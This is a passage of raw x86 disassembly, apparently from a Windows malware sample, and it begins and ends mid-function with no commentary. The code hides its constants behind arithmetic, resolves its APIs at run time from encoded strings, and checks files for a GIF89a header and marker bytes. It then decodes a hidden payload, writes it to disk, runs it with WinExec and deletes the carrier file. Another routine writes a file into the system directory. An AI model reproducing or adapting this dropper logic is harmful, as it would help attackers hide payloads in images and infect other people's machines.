mov [ebp+var_10], edi
mov eax, esi
mul [ebp+var_8]
mov [ebp+var_1C], eax
and eax, 0FFh
push eax
call sub_43B35A
mov ebx, eax
mov [ebp+var_1], bl
mov eax, dword_44C134
add eax, dword_44C220
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_43F28C
mov ebx, eax
mov [ebp+var_11], bl
mov eax, esi
mul [ebp+var_C]
mov [ebp+var_20], eax
and eax, 0FFh
push eax
call sub_43B35A
mov ebx, eax
mov [ebp+var_12], bl
mov eax, dword_44C1A0
add eax, 6Eh
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_43F28C
mov ebx, eax
mov [ebp+var_13], bl
mov eax, esi
and eax, 0FFh
push eax
call sub_43B35A
mov ebx, eax
mov [ebp+var_14], bl
mov eax, dword_44C1AC
add eax, 2Ah
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_43F28C
mov ebx, eax
mov [ebp+var_15], bl
mov eax, esi
mul [ebp+var_10]
mov [ebp+var_24], eax
and eax, 0FFh
push eax
call sub_43B35A
mov ebx, eax
mov [ebp+var_16], bl
mov eax, dword_44C14C
add eax, 40h
movsx edx, word_44C100
add eax, edx
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_43F28C
mov ebx, eax
mov [ebp+var_17], bl
movsx eax, word_44C240
add eax, 41h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_43B35A
add esp, 24h
mov ebx, eax
mov [ebp+var_18], bl
movzx edi, [ebp+var_1]
mov eax, edi
shr eax, 1
mov esi, dword_44C19C
add esi, dword_44C12C
sub esi, 0Ch
mul esi
mov [ebp+var_28], eax
mov esi, eax
cmp esi, edi
jnz short loc_43CDD7
push offset word_44D356
call sub_43E507
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call ds:dword_44B634
add esp, 30h
jmp short loc_43CE1B
; ---------------------------------------------------------------------------
loc_43CDD7: ; CODE XREF: sub_43CBE3+1AC�j
push offset byte_44D33B
call sub_43E507
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call ds:dword_44B634
add esp, 30h
loc_43CE1B: ; CODE XREF: sub_43CBE3+1F2�j
pop edi
pop esi
pop ebx
leave
retn
sub_43CBE3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43CE20 proc near ; CODE XREF: sub_4413B6+15E�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
mov esi, [ebp+arg_8]
mov eax, ebx
add eax, 2
mov ecx, 3
mov edx, 0AAAAAAABh
mul edx
shr edx, 1
mov [ebp+var_4], edx
mov edi, edx
shl edi, 2
mov edx, [ebp+arg_C]
dec edx
cmp edi, edx
jbe short loc_43CE93
xor eax, eax
jmp loc_43CF42
; ---------------------------------------------------------------------------
loc_43CE58: ; CODE XREF: sub_43CE20+83�j
push esi
push [ebp+arg_0]
call sub_441932
add esp, 8
mov eax, dword_44C268
dec eax
sub ebx, eax
mov eax, dword_44C274
add eax, dword_44C278
add eax, [ebp+arg_0]
mov [ebp+arg_0], eax
movsx eax, word_44C208
movsx edx, word_44C144
add eax, edx
sub eax, 7
lea esi, [esi+eax]
loc_43CE93: ; CODE XREF: sub_43CE20+2F�j
mov eax, dword_44C12C
add eax, dword_44C1A8
sub eax, 7
cmp ebx, eax
jnb short loc_43CE58
movsx eax, word_44C0E8
dec eax
cmp ebx, eax
jbe short loc_43CF22
push 3
movsx eax, word_44C100
movsx edx, word_44C218
add eax, edx
sub eax, 8
push eax
lea eax, [ebp+var_7]
push eax
call ds:dword_44A644
push ebx
push [ebp+arg_0]
lea eax, [ebp+var_7]
push eax
call ds:dword_44A638
push esi
lea eax, [ebp+var_7]
push eax
call sub_441932
add esp, 20h
mov eax, dword_44C17C
movsx edx, word_44C27C
add eax, edx
sub eax, 6
mov byte ptr [esi+eax], 3Dh
mov eax, dword_44C12C
sub eax, 7
cmp ebx, eax
jnz short loc_43CF17
mov eax, dword_44C274
inc eax
mov byte ptr [esi+eax], 3Dh
loc_43CF17: ; CODE XREF: sub_43CE20+EB�j
mov eax, dword_44C12C
sub eax, 4
lea esi, [esi+eax]
loc_43CF22: ; CODE XREF: sub_43CE20+8F�j
mov eax, dword_44C238
movsx edx, word_44C0A4
add eax, edx
sub eax, 6
mov edx, dword_44C244
sub edx, 4
mov [esi+eax], dl
xor eax, eax
inc eax
loc_43CF42: ; CODE XREF: sub_43CE20+33�j
pop edi
pop esi
pop ebx
leave
retn
sub_43CE20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43CF47 proc near ; CODE XREF: sub_43DA75+22E�p
; sub_43DA75+240�p
var_61DA0 = dword ptr -61DA0h
var_61D9C = dword ptr -61D9Ch
var_61D98 = byte ptr -61D98h
var_61C99 = byte ptr -61C99h
var_61C98 = dword ptr -61C98h
var_61C91 = byte ptr -61C91h
var_30F51 = byte ptr -30F51h
var_30F50 = dword ptr -30F50h
var_30F4B = byte ptr -30F4Bh
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30E3E = byte ptr -30E3Eh
var_30E3D = byte ptr -30E3Dh
var_30E3C = byte ptr -30E3Ch
var_30E3B = byte ptr -30E3Bh
var_30E3A = byte ptr -30E3Ah
var_30E15 = byte ptr -30E15h
var_30E14 = byte ptr -30E14h
var_30DC4 = byte ptr -30DC4h
var_30DBE = byte ptr -30DBEh
var_30DBD = byte ptr -30DBDh
var_30DBC = byte ptr -30DBCh
var_30D4E = byte ptr -30D4Eh
var_30D46 = byte ptr -30D46h
var_30D43 = byte ptr -30D43h
var_30D40 = byte ptr -30D40h
var_30D3F = byte ptr -30D3Fh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 61DA0h
call sub_444F6C
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
and [ebp+var_30F50], 0
push 0
mov eax, dword_44C244
movsx edx, word_44C0FC
add eax, edx
sub eax, 0Ah
push eax
push 3
push 0
mov eax, dword_44C094
sub eax, 6
push eax
push 80000000h
push [ebp+arg_0]
call ds:dword_44B788 ; CreateFileA
mov [ebp+var_30E48], eax
cmp eax, 0FFFFFFFFh
jz loc_43D3C7
push 0
lea eax, [ebp+var_30E4C]
push eax
mov eax, dword_44C108
add eax, 7Eh
add eax, dword_44C0C8
push eax
lea eax, [ebp+var_30E3F]
push eax
push [ebp+var_30E48]
call ds:dword_446028 ; ReadFile
mov [ebp+var_30E44], eax
movsx eax, word_44C16C
dec eax
cmp [ebp+var_30E44], eax
jz loc_43D3A9
cmp [ebp+var_30E3F], 47h
jnz short loc_43D01A
cmp [ebp+var_30E3E], 49h
jnz short loc_43D01A
cmp [ebp+var_30E3D], 46h
jnz short loc_43D01A
cmp [ebp+var_30E3C], 38h
jnz short loc_43D01A
cmp [ebp+var_30E3B], 39h
jnz short loc_43D01A
cmp [ebp+var_30E3A], 61h
jz short loc_43D01F
loc_43D01A: ; CODE XREF: sub_43CF47+A4�j
; sub_43CF47+AD�j ...
jmp loc_43D3A9
; ---------------------------------------------------------------------------
loc_43D01F: ; CODE XREF: sub_43CF47+D1�j
movzx eax, [ebp+var_30E15]
movsx edx, word_44C1DC
mov ecx, dword_44C164
lea edx, [edx+ecx+36h]
cmp eax, edx
jnz short loc_43D04D
cmp [ebp+var_30DBE], 3Dh
jnz short loc_43D04D
cmp [ebp+var_30DBD], 3Dh
jz short loc_43D052
loc_43D04D: ; CODE XREF: sub_43CF47+F2�j
; sub_43CF47+FB�j
jmp loc_43D3A9
; ---------------------------------------------------------------------------
loc_43D052: ; CODE XREF: sub_43CF47+104�j
or ebx, ebx
jnz short loc_43D081
mov al, [ebp+var_30DBC]
mov [ebp+var_30F51], al
call sub_442DA6
mov edx, eax
mov [ebp+var_61C99], dl
mov al, [ebp+var_61C99]
cmp al, [ebp+var_30F51]
jz loc_43D3A9
loc_43D081: ; CODE XREF: sub_43CF47+10D�j
push 0
lea eax, [ebp+var_30E4C]
push eax
push 30D40h
lea eax, [ebp+var_61C91]
push eax
push [ebp+var_30E48]
call ds:dword_446028 ; ReadFile
mov [ebp+var_30E44], eax
mov eax, dword_44C094
sub eax, 6
cmp [ebp+var_30E44], eax
jz loc_43D3A9
mov eax, [ebp+var_30E4C]
mov edx, dword_44C110
add edx, dword_44C268
sub edx, 9
mov [ebp+eax+var_61C91], dl
push 30D40h
lea eax, [ebp+var_30D40]
push eax
lea eax, [ebp+var_61C91]
push eax
call sub_43A348
add esp, 0Ch
mov esi, eax
mov eax, dword_44C184
mov edi, eax
add edi, dword_44C210
sub edi, 3
jmp short loc_43D14C
; ---------------------------------------------------------------------------
loc_43D107: ; CODE XREF: sub_43CF47+207�j
or ebx, ebx
jz short loc_43D11E
movzx eax, [ebp+edi+var_30D40]
sub eax, edi
mov [ebp+edi+var_30D40], al
jmp short loc_43D14B
; ---------------------------------------------------------------------------
loc_43D11E: ; CODE XREF: sub_43CF47+1C2�j
movzx eax, [ebp+edi+var_30D40]
mov [ebp+var_61D9C], eax
mov eax, edi
mul edi
mov [ebp+var_61DA0], eax
mov eax, [ebp+var_61D9C]
mov edx, [ebp+var_61DA0]
sub eax, edx
mov [ebp+edi+var_30D40], al
loc_43D14B: ; CODE XREF: sub_43CF47+1D5�j
inc edi
loc_43D14C: ; CODE XREF: sub_43CF47+1BE�j
cmp edi, esi
jb short loc_43D107
or ebx, ebx
jz short loc_43D16D
mov eax, dword_44C254
sub eax, 8
mov edx, esi
sub edx, eax
mov eax, dword_44C274
dec eax
mov [ebp+edx+var_30D40], al
loc_43D16D: ; CODE XREF: sub_43CF47+20B�j
movsx eax, word_44C104
mov edx, dword_44C0A0
movsx ecx, word_44C0E8
add edx, ecx
sub edx, 5
mov [ebp+eax+var_30DC4], dl
push 0FFh
lea eax, [ebp+var_61D98]
push eax
lea eax, [ebp+var_30E14]
push eax
call sub_43A348
lea eax, [ebp+var_61D98]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
call sub_43E2C0
add esp, 18h
mov [ebp+var_30E44], eax
mov eax, dword_44C09C
sub eax, 5
cmp [ebp+var_30E44], eax
jnz loc_43D3A9
mov [ebp+var_30F50], 1
or ebx, ebx
jz loc_43D306
mov eax, dword_44C25C
add eax, dword_44C19C
cmp [ebp+eax+var_30D4E], 64h
jnz short loc_43D276
movzx eax, [ebp+var_30D3F]
movsx edx, word_44C1FC
add edx, 1Bh
sub eax, edx
mov byte ptr [ebp+var_61D9C+3], al
movzx eax, byte ptr [ebp+var_61D9C+3]
push eax
push 0
call sub_442511
mov eax, dword_44C25C
sub eax, 8
mov ds:dword_448620, eax
mov eax, dword_44C0AC
dec eax
mov dword_44C350, eax
mov eax, dword_44C148
movsx edx, word_44C0C0
sub edx, 2
mov [ebp+eax+var_30D40], dl
movsx eax, word_44C16C
movsx edx, word_44C0D0
add eax, edx
sub eax, 7
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_43F8DE
add esp, 10h
loc_43D276: ; CODE XREF: sub_43CF47+2B4�j
mov eax, dword_44C0A8
cmp [ebp+eax+var_30D46], 67h
jnz loc_43D3A9
movsx eax, word_44C144
movsx edx, word_44C0D0
add eax, edx
mov edx, dword_44C128
sub edx, 9
mov [ebp+eax+var_30D43], dl
lea eax, [ebp+var_30D3F]
push eax
call ds:dword_446054
mov [ebp+var_61D9C], eax
push eax
push offset dword_44B670
call sub_43CBE3
mov eax, dword_44C0F0
dec eax
mov ds:dword_448620, eax
movsx eax, word_44C0FC
sub eax, 6
mov dword_44C350, eax
movsx eax, word_44C144
add eax, dword_44C204
sub eax, 6
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_43F8DE
add esp, 14h
jmp loc_43D3A9
; ---------------------------------------------------------------------------
loc_43D306: ; CODE XREF: sub_43CF47+29B�j
movsx eax, word_44C098
add eax, 5
push eax
lea eax, [ebp+var_30F4B]
push eax
call sub_441353
push offset byte_44D333
call sub_43E507
push eax
lea edx, [ebp+var_30F4B]
push edx
call ds:dword_446020
push 0
push 80h
push 2
push 0
mov eax, dword_44C090
sub eax, 3
push eax
push 40000000h
lea eax, [ebp+var_30F4B]
push eax
call ds:dword_44B788 ; CreateFileA
mov [ebp+var_61C98], eax
push 0
lea eax, [ebp+var_30E4C]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
push [ebp+var_61C98]
call ds:dword_44BB8C ; WriteFile
push [ebp+var_61C98]
call ds:dword_44A654 ; CloseHandle
push 5
lea eax, [ebp+var_30F4B]
push eax
call ds:dword_4480E0 ; WinExec
movzx eax, [ebp+var_30F51]
push eax
call sub_43D982
add esp, 18h
loc_43D3A9: ; CODE XREF: sub_43CF47+97�j
; sub_43CF47:loc_43D01A�j ...
push [ebp+var_30E48]
call ds:dword_44A654 ; CloseHandle
cmp [ebp+var_30F50], 0
jz short loc_43D3C7
push [ebp+arg_0]
call ds:dword_446008 ; DeleteFileA
loc_43D3C7: ; CODE XREF: sub_43CF47+52�j
; sub_43CF47+475�j
pop edi
pop esi
pop ebx
leave
retn
sub_43CF47 endp
; =============== S U B R O U T I N E =======================================
sub_43D3CC proc near ; CODE XREF: sub_440C0A+16�p
push edi
push offset word_44D326
call sub_43E507
pop ecx
push eax
call ds:dword_4485E8 ; GetModuleHandleA
mov dword_44C2A4, eax
test eax, eax
jnz short loc_43D3FF
push offset byte_44D319
call sub_43E507
pop ecx
push eax
call ds:dword_449244 ; LoadLibraryA
mov dword_44C2A4, eax
loc_43D3FF: ; CODE XREF: sub_43D3CC+1A�j
push offset word_44D306
call sub_43E507
push eax
push dword_44C2A4
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44BBB4, eax
push offset word_44D2F2
call sub_43E507
push eax
push dword_44C2A4
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_448624, eax
push offset word_44D2E2
call sub_43E507
push eax
push dword_44C2A4
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_4480D0, eax
push offset dword_44D2D0
call sub_43E507
push eax
push dword_44C2A4
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_4480D8, eax
push offset byte_44D2C1
call sub_43E507
add esp, 14h
push eax
push dword_44C2A4
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44B648, eax
pop edi
retn
sub_43D3CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D490 proc near ; DATA XREF: sub_43B63B+B�o
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
mov esi, [ebp+arg_8]
mov eax, offset sub_43DA5C
mov [esi+0B8h], eax
mov eax, [ebp+arg_4]
mov [esi+0C4h], eax
popa
mov esp, ebp
pop ebp
xor eax, eax
retn
sub_43D490 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_43D4B3 proc near ; CODE XREF: sub_440C0A+11�p
push edi
push offset dword_44D2B4
call sub_43E507
pop ecx
push eax
call ds:dword_4485E8 ; GetModuleHandleA
mov dword_44C2A0, eax
test eax, eax
jnz short loc_43D4E6
push offset byte_44D2A7
call sub_43E507
pop ecx
push eax
call ds:dword_449244 ; LoadLibraryA
mov dword_44C2A0, eax
loc_43D4E6: ; CODE XREF: sub_43D4B3+1A�j
push offset dword_44D298
call sub_43E507
push eax
push dword_44C2A0
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_449250, eax
push offset word_44D286
call sub_43E507
add esp, 8
push eax
push dword_44C2A0
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_447120, eax
pop edi
retn
sub_43D4B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D523 proc near ; CODE XREF: sub_44206A+142�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_444F6C
push ebx
push esi
push edi
mov eax, dword_44C1F4
sub eax, 4
push eax
lea eax, [ebp+var_FFF]
push eax
call sub_442511
add esp, 8
movsx edi, word_44C100
sub edi, 3
jmp short loc_43D571
; ---------------------------------------------------------------------------
loc_43D557: ; CODE XREF: sub_43D523+54�j
cmp [ebp+edi+var_FFF], 23h
jnz short loc_43D570
mov eax, dword_44C288
sub eax, 6
mov [ebp+edi+var_FFF], al
loc_43D570: ; CODE XREF: sub_43D523+3C�j
inc edi
loc_43D571: ; CODE XREF: sub_43D523+32�j
cmp edi, 0FFFh
jb short loc_43D557
lea esi, [ebp+var_FFF]
loc_43D57F: ; CODE XREF: sub_43D523+EC�j
push offset word_44D282
call sub_43E507
push offset dword_447020
mov ebx, dword_44C134
movsx edx, word_44C0B0
add ebx, edx
sub ebx, 0Fh
push ebx
mov ebx, dword_44C20C
movsx edx, word_44C250
add ebx, edx
sub ebx, 7
push ebx
push eax
mov ebx, dword_44C224
sub ebx, 5
push ebx
push 0
push esi
push [ebp+arg_0]
mov ebx, dword_44C1D4
add ebx, dword_44C1C4
sub ebx, 5
and ebx, 0FFh
push ebx
call sub_43F058
add esp, 28h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43D5E8: ; CODE XREF: sub_43D523+CA�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D5E8
movsx edx, word_44C1E0
sub edx, 2
mov ebx, eax
add ebx, esi
mov esi, edx
add esi, ebx
movsx eax, byte ptr [esi]
mov edx, dword_44C25C
sub edx, 8
cmp eax, edx
jnz loc_43D57F
pop edi
pop esi
pop ebx
leave
retn
sub_43D523 endp
; =============== S U B R O U T I N E =======================================
sub_43D61A proc near ; DATA XREF: .data:0044C3A8�o
mov eax, 80004001h
retn 10h
sub_43D61A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D622 proc near ; CODE XREF: sub_44206A+1A1�p
; sub_44206A+1C2�p
var_4F = byte ptr -4Fh
var_1D = byte ptr -1Dh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 50h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call ds:dword_44B770 ; GetTickCount
mov [ebp+var_8], eax
mov esi, dword_44C140
sub esi, 9
jmp short loc_43D689
; ---------------------------------------------------------------------------
loc_43D642: ; CODE XREF: sub_43D622+79�j
cmp ds:dword_447130[esi*4], 0
jz short loc_43D688
mov edx, ds:dword_44A660[esi*4]
mov ecx, dword_44C0C8
add ecx, 0EA5Fh
movsx eax, word_44C0E8
add ecx, eax
mov eax, dword_44C0A8
add eax, dword_44C1E8
sub eax, 2
imul ecx, eax
add edx, ecx
cmp edx, [ebp+var_8]
jnb short loc_43D688
and ds:dword_447130[esi*4], 0
loc_43D688: ; CODE XREF: sub_43D622+28�j
; sub_43D622+5C�j
inc esi
loc_43D689: ; CODE XREF: sub_43D622+1E�j
mov eax, dword_44C0F0
add eax, 3E4h
add eax, dword_44C13C
cmp esi, eax
jb short loc_43D642
loc_43D69D: ; CODE XREF: sub_43D622+99�j
; sub_43D622+281�j
mov eax, [ebx]
mov [ebp+var_14], eax
lea ebx, [ebx+eax]
mov eax, ebx
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb loc_43D8A9
mov eax, dword_44C244
cmp [ebp+var_14], eax
ja short loc_43D69D
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_43D6C2: ; CODE XREF: sub_43D622+A5�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D6C2
mov [ebp+var_10], eax
mov eax, ebx
sub eax, [ebp+arg_0]
movsx edx, word_44C264
add edx, dword_44C204
sub edx, 6
sub eax, edx
mov [ebp+var_C], eax
mov [ebp+var_1], 44h
mov eax, dword_44C204
sub eax, 1
cmp byte ptr [ebx+eax], 2Ah
jnz short loc_43D6FC
mov [ebp+var_1], 43h
loc_43D6FC: ; CODE XREF: sub_43D622+D4�j
mov edi, dword_44C0EC
sub edi, 4
jmp short loc_43D72E
; ---------------------------------------------------------------------------
loc_43D707: ; CODE XREF: sub_43D622+121�j
cmp ds:dword_447130[edi*4], 0
jz short loc_43D72D
mov edx, [ebp+var_C]
cmp ds:dword_446060[edi*4], edx
jnz short loc_43D72D
mov dl, ds:byte_448200[edi]
cmp dl, [ebp+var_1]
jz loc_43D888
loc_43D72D: ; CODE XREF: sub_43D622+ED�j
; sub_43D622+F9�j
inc edi
loc_43D72E: ; CODE XREF: sub_43D622+E3�j
mov eax, dword_44C194
add eax, 3D9h
movsx edx, word_44C0FC
add eax, edx
cmp edi, eax
jb short loc_43D707
mov eax, dword_44C168
add eax, 3BEh
movsx edx, word_44C260
add eax, edx
cmp [ebp+var_10], eax
jbe loc_43D831
mov eax, dword_44C0F8
add eax, 7
movsx edx, word_44C16C
add eax, edx
push eax
lea eax, [ebp+var_4F]
push eax
call sub_441353
add esp, 8
mov eax, dword_44C0AC
add eax, 3BFh
mov [ebp+var_18], eax
movsx eax, word_44C0FC
add eax, dword_44C1F8
sub eax, 9
mov [ebp+var_1C], eax
loc_43D79F: ; CODE XREF: sub_43D622+20A�j
mov eax, [ebp+var_18]
mov al, [ebx+eax]
mov [ebp+var_1D], al
mov eax, [ebp+var_18]
mov edx, dword_44C114
movsx ecx, word_44C1B4
add edx, ecx
sub edx, 0Ch
mov [ebx+eax], dl
push offset dword_447020
push [ebp+var_10]
push [ebp+var_1C]
lea eax, [ebp+var_4F]
push eax
mov eax, [ebp+arg_C]
push dword ptr [eax]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
mov eax, dword_44C1EC
add eax, dword_44C0A0
sub eax, 0Ch
and eax, 0FFh
push eax
call sub_43F058
add esp, 24h
mov eax, [ebp+var_18]
mov dl, [ebp+var_1D]
mov [ebx+eax], dl
mov [ebp+var_1C], eax
mov eax, dword_44C1B0
add eax, 3B6h
movsx edx, word_44C118
add eax, edx
add [ebp+var_18], eax
mov eax, [ebp+var_10]
cmp [ebp+var_18], eax
jbe short loc_43D824
mov [ebp+var_18], eax
loc_43D824: ; CODE XREF: sub_43D622+1FD�j
mov eax, [ebp+var_10]
cmp [ebp+var_1C], eax
jnb short loc_43D883
jmp loc_43D79F
; ---------------------------------------------------------------------------
loc_43D831: ; CODE XREF: sub_43D622+139�j
push offset byte_44D27D
call sub_43E507
push offset dword_447020
push [ebp+var_10]
movsx edx, word_44C100
add edx, dword_44C1F8
sub edx, 6
push edx
push eax
mov edx, [ebp+arg_C]
push dword ptr [edx]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
movsx edx, word_44C0FC
movsx ecx, word_44C0D0
add edx, ecx
sub edx, 0Dh
and edx, 0FFh
push edx
call sub_43F058
add esp, 28h
loc_43D883: ; CODE XREF: sub_43D622+208�j
mov eax, [ebp+arg_C]
inc dword ptr [eax]
loc_43D888: ; CODE XREF: sub_43D622+105�j
mov eax, [ebp+var_10]
lea ebx, [ebx+eax]
inc ebx
mov eax, [ebp+arg_C]
mov edx, dword_44C1F8
add edx, 0Bh
add edx, dword_44C094
cmp [eax], edx
jbe loc_43D69D
loc_43D8A9: ; CODE XREF: sub_43D622+8B�j
push offset off_44D279
call sub_43E507
push offset dword_447020
movsx edx, word_44C1F0
movsx ecx, word_44C27C
add edx, ecx
sub edx, 7
push edx
movsx edx, word_44C170
sub edx, 2
push edx
push eax
mov edx, dword_44C140
add edx, dword_44C244
sub edx, 0Dh
push edx
push 0
push 0
push [ebp+arg_8]
mov edx, dword_44C1AC
add edx, dword_44C210
sub edx, 5
and edx, 0FFh
push edx
call sub_43F058
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_43D622 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D912 proc near ; DATA XREF: sub_43B992+26�o
var_1FFF = byte ptr -1FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2000h
call sub_444F6C
push esi
push edi
push 1FFFh
lea eax, [ebp+var_1FFF]
push eax
push [ebp+arg_0]
call ds:dword_44BBA4 ; GetWindowTextA
push offset dword_44D264
call sub_43E507
mov edi, dword_44C224
add edi, dword_44C134
sub edi, 0Ch
push edi
push eax
lea edi, [ebp+var_1FFF]
push edi
call sub_43A4B5
add esp, 10h
mov esi, dword_44C198
add esi, 0FFFDh
cmp eax, esi
jz short loc_43D979
push [ebp+arg_0]
call sub_43B3B1
pop ecx
loc_43D979: ; CODE XREF: sub_43D912+5C�j
xor eax, eax
inc eax
pop edi
pop esi
leave
retn 8
sub_43D912 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D982 proc near ; CODE XREF: sub_43CF47+45A�p
; DATA XREF: sub_43BB7B+D7�o
var_270 = byte ptr -270h
var_26C = byte ptr -26Ch
var_267 = byte ptr -267h
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 26Ch
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_448600 ; GetSystemDirectoryA
lea eax, [ebp+var_168]
push eax
call sub_44185A
push offset byte_44D25F
call sub_43E507
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_446020
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call ds:dword_446020
push offset byte_44D257
call sub_43E507
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_446020
add esp, 24h
movsx eax, word_44C124
add eax, dword_44C1A0
mov dl, [ebp+arg_0]
mov [ebp+eax+var_270], dl
push 0
push 80h
push 4
push 0
movsx eax, word_44C170
sub eax, 2
push eax
push 40000000h
lea eax, [ebp+var_104]
push eax
call ds:dword_44B788 ; CreateFileA
mov edi, eax
push 0
lea eax, [ebp+var_26C]
push eax
mov eax, dword_44C248
inc eax
push eax
lea eax, [ebp+var_267]
push eax
push edi
call ds:dword_44BB8C ; WriteFile
push edi
call ds:dword_44A654 ; CloseHandle
pop edi
pop esi
leave
retn
sub_43D982 endp
; =============== S U B R O U T I N E =======================================
sub_43DA5C proc near ; DATA XREF: sub_43D490+7�o
mov eax, dword_44C1E4
movsx edx, word_44C1E0
add eax, edx
sub eax, 6
push eax
call ds:dword_44B664 ; ExitThread
retn
sub_43DA5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DA75 proc near ; CODE XREF: sub_43DA75+299�p
; sub_43DA75+307�p ...
var_268 = byte ptr -268h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = word ptr -258h
var_256 = word ptr -256h
var_252 = word ptr -252h
var_250 = word ptr -250h
var_24E = word ptr -24Eh
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_8 = byte ptr 10h
arg_18 = byte ptr 20h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 268h
push ebx
push esi
push edi
push 0
call ds:dword_44B630
xor ebx, ebx
inc ebx
push offset byte_44D24F
call sub_43E507
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call ds:dword_44B634
add esp, 14h
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call ds:dword_449258 ; FindFirstFileA
mov [ebp+var_248], eax
mov eax, dword_44C128
movsx edx, word_44C180
add eax, edx
sub eax, 0Ch
neg eax
cmp [ebp+var_248], eax
jnz loc_43DCC2
movsx eax, word_44C1B4
sub eax, 4
cmp [ebp+arg_20], eax
ja loc_43DD8B
movsx eax, word_44C170
mov edx, dword_44C268
lea eax, [eax+edx+3FAh]
cmp [ebp+arg_24], eax
jnb short loc_43DB2B
mov eax, dword_44C1B0
add eax, 95h
movsx edx, word_44C150
add eax, edx
cmp [ebp+arg_24], eax
jnz loc_43DD8B
loc_43DB2B: ; CODE XREF: sub_43DA75+98�j
movsx eax, word_44C1C0
add eax, 30D3Ch
cmp [ebp+arg_24], eax
ja loc_43DD8B
lea eax, [ebp+arg_18]
push eax
lea eax, [ebp+arg_8]
push eax
call ds:dword_44B780 ; CompareFileTime
mov [ebp+var_260], eax
mov eax, dword_44C23C
add eax, dword_44C1BC
sub eax, 0Eh
cmp [ebp+var_260], eax
jge short loc_43DB77
lea edi, [ebp+var_268]
lea esi, [ebp+arg_18]
movsd
movsd
jmp short loc_43DB82
; ---------------------------------------------------------------------------
loc_43DB77: ; CODE XREF: sub_43DA75+F3�j
lea edi, [ebp+var_268]
lea esi, [ebp+arg_8]
movsd
movsd
